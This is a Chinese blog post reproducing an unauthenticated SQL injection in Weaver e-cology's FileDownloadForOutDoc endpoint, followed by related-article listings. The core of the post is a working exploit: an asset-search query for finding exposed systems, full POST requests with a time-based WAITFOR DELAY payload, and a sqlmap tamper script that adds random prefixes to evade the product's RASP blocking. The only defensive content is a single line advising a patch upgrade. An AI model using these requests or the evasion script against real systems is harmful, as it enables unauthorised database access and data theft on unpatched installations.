泛微OA 最新前台未授权sql注入

最新推荐文章于 2024-05-02 01:04:40 发布
最新推荐文章于 2024-05-02 01:04:40 发布
阅读量916 收藏 2
点赞数 1
分类专栏: 漏洞复现 文章标签: sql 数据库 泛微oa
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jd_cx/article/details/131896072
版权

漏洞介绍

泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公。

泛微e-cology FileDownloadForOutDoc 未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。

影响版本

部分e-cology 8且补丁版本<10.58.0

部分e-cology 9且补丁版本<10.58.0

资产测绘

app=“泛微-协同商务系统”

漏洞复现

1.访问泛微OA业务系统
在这里插入图片描述
2.检测payload

POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Content-Length: 45
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: close

fileid=3+WAITFOR+DELAY+'0:0:5'&isFromOutImg=1

3.由于泛微OA启用了RASP,同一个请求执行两次会被拦截,所以需要在请求包中添加随机参数;下面是RASP的介绍

RASP是Runtime Application Self-Protection(运行时应用自我保护)的缩写,是一种用于保护应用程序免受攻击的安全技术。它是在应用程序运行时进行安全检测和保护的一种方法,可以在应用程序本身内部或与应用程序紧密集成的组件中实现。

POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Content-Length: 45
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: close

fileid={random}+WAITFOR+DELAY+'0:0:5'&isFromOutImg=1

4.加载tamper脚本进行注入

import random
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGH


def tamper(payload, **kwargs):
    res = ""
    ran = random.randint(1,2**20)
    res = str(ran)+payload
    return res

在这里插入图片描述

修复建议

目前官方已发布安全补丁,建议受影响用户尽快将补丁版本升级至10.58及以上。

https://www.weaver.com.cn/cs/securityDownload.asp#

Sword-heart
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
泛微OA8前台sql注入1
08-08
cmd=getSelectAllId&sql=***注入点 在getdata.jsp中,直接将request对象交给weaver.hrm.common.Ajax
泛微 e-cology SQL注入漏洞复现
07-12 1511
此文章仅用于技术交流,严禁用于对外发起恶意攻击!!!
泛微e-cology9 SQL注入漏洞复现(QVD-2023-5012)
ZL_1618的博客
03-09 1076
泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。泛微e-cology9中存在SQL注入漏洞,经身份认证的远程攻击者即可利用此漏洞获取数据库敏感信息,进一步利用可能导致目标系统被控。
泛微E-Cology SQL注入漏洞复现(QVD-2023-15672)
huangyongkang666的博客
11-27 699
泛微E-Cology SQL注入漏洞复现(QVD-2023-15672)weaverweaver.file.FileDownloadForOutDoc
【漏洞复现】泛微 e-cology 前台SQL注入漏洞
2301_79099363的博客
07-12 1745
【漏洞复现】泛微 e-cology 前台SQL注入漏洞
用友NC Cloud存在前台远程命令执行漏洞
holyxp的博客
07-22 465
用友网络是全球领先的企业与公共组织软件、云服务、金融服务提供商。提供营销、制造、财务、人力等产品与服务,帮助客户实现发展目标,进而推动商业和社会进步。
【1day】复现泛微e-cology SQL注入漏洞weaver.file.FileDownloadForOutDoc(QVD-2023-15672)
记录并分享学习安全的知识点..
07-12 842
泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。泛微e-cology SQL注入漏洞weaver.file.FileDownloadForOutDoc存在SQL注入漏洞。
分享8:文件操作(java模拟上传下载)
cc_百川
11-20 699
需求: 使用java通过下载连接下载数据并上传到其他服务器。 下载: 第一:下载网络文件: /** * 下载网络文件 * @throws MalformedURLException */ public void downloadNet(String neturl, String outurl) throws MalformedURLException { ...
泛微OA e-cology FileDownloadForOutDoc前台SQL注入漏洞
maverickpig的博客
08-09 1461
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。更多复现文章可关注:网安小白成长日记。
泛微最近的漏洞利用工具
weixin_46211944的博客
08-03 372
WorkflowServiceXml 内存马注入、uploaderOperate文件上传漏洞、DeleteUserRequestInfoByXml 、FileDownloadForOutDocSQL注入、E-Mobile 6.0 命令执行漏洞检测。集成了QVD-2023-5012、CVE-2023-2523、CVE-2023-2648、getloginid_ofsLogin 漏洞利用。免责声明:本工具不得用于商业用途,仅做学习交流,如用作他途造成的一切后果请自行承担!泛微最近的漏洞利用工具。
泛微Excel文件导出
weixin_40476233的博客
07-15 1996
泛微Excel文件导出说明前端代码前端页面现有的id和name标准规格:js代码:js代码注意点:后端代码jsp代码获取到数据并把数据以Excel形式表现出来FL_ExcelExportDetailUtil.jsp文件GetTextByColumn.java文件下面是查询的sql 说明 这个功能是基于泛微8.0平台,以js代码,调用后端jsp动态导出Excel文件。 前端代码 前端页面现有的id和name标准规格: js代码: //明细1导出 var str1="<input type='butto
泛微OA8前台SQL注入1
08-03
cmd=getSelectAllId&sql=***注入点在 getdata.jsp 中,直接将 request 对象交给方法处理在 getData 方法中,判
泛微系统SQL语句大全
12-29
泛微系统中常见的主要基于SQL server相关的SQL语句大全, 其中包括组织架构相关SQL,流程相关SQL以及其他自定义需求; 效率排名,等SQL总数将近百;
泛微OA ECOLOGY 授权生成器
07-25
泛微OA ECOLOGY8.X系列 授权生成器,直接导入授权文件,支持最新的版本
泛微OA获取wpsV5授权jsp
05-25
泛微OA获取wpsV5授权jsp 详情点击:https://blog.csdn.net/qq_31614535/article/details/124960394
手撕spring框架(3)
dzend的专栏
05-01 594
在Spring框架中,BeanPostProcessor是一个接口,它允许在Spring容器实例化bean之后和调用bean的初始化方法之前对bean进行自定义处理。BeanPostProcessor接口定义了两个方法:postProcessBeforeInitialization和postProcessAfterInitialization。通过实现这两个方法,我们可以在bean初始化前后做一些额外的操作,比如修改bean的属性值、添加额外的逻辑等。
常用SQL命令
最新发布
wenxiaoba的博客
05-02 1106
常用SQL语句使用说明和示例
SQL底层执行过程
qq_14886109的博客
04-28 926
SQL底层执行过程,INNODB,二阶段提交
优化SQL的方法
weixin_44139651的博客
04-26 1569
使用join实现,但不适合join太多表,阿里巴巴开发者手册的规定,join表的数量不应该超过3个,join表数量太多时,会导致mysql在选错索引。一般SQL优化第一考虑的是索引优化,可使用explain命令,查看MySQL的执行计划,确认SQL是否有走索引。相对连接查询,子查询使用in关键字实现,具有结构化,相对简单,但是需要创建和删除临时表,增加资源消耗。索引可提升SQL效率,但索引需要额外的存储空间,而且还会有一定的性能消耗。left join,两个表的交集,以及左表剩余的数据,左表为驱动表。
泛微oa e-cology v9 browser.jsp sql注入漏洞
09-15
泛微OA E-Cology V9是一款常用的企业办公自动化系统,该系统的browser.jsp页面存在SQL注入漏洞。SQL注入是一种常见的网络攻击技术,攻击者可以通过构造恶意的SQL语句来绕过系统的认证和授权机制,进而获取敏感数据或者对系统进行非法操作。 泛微OA E-Cology V9中的browser.jsp页面是用于显示OA系统中的个人文件夹和公共文件夹。攻击者可以在该页面中输入恶意的SQL语句,通过执行这些恶意SQL语句,攻击者可以获取到不应该被访问的数据,比如其他用户的文件,甚至可以对数据库进行修改和损坏。 为了防止SQL注入漏洞的利用,可以采取以下措施: 1. 输入过滤和验证:在服务器端对用户输入的数据进行过滤和验证,去除或转义可能包含恶意SQL代码的字符,确保只接受合法的输入。 2. 使用参数化查询:尽量使用参数化查询代替拼接SQL语句的方式,参数化查询可以预编译SQL语句,避免在拼接时引入恶意代码。 3. 限制数据库用户的权限:对数据库用户进行权限控制,确保每个用户只拥有最小必要的权限,减少攻击者利用SQL注入漏洞进行非法操作的机会。 4. 及时更新和修补漏洞:及时跟进厂商的安全通告并安装最新的补丁程序,确保系统始终处于最新的安全状态。 综上所述,泛微OA E-Cology V9中的browser.jsp页面存在SQL注入漏洞,但通过合理的安全措施和注意事项,我们可以有效地减少该漏洞被利用的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值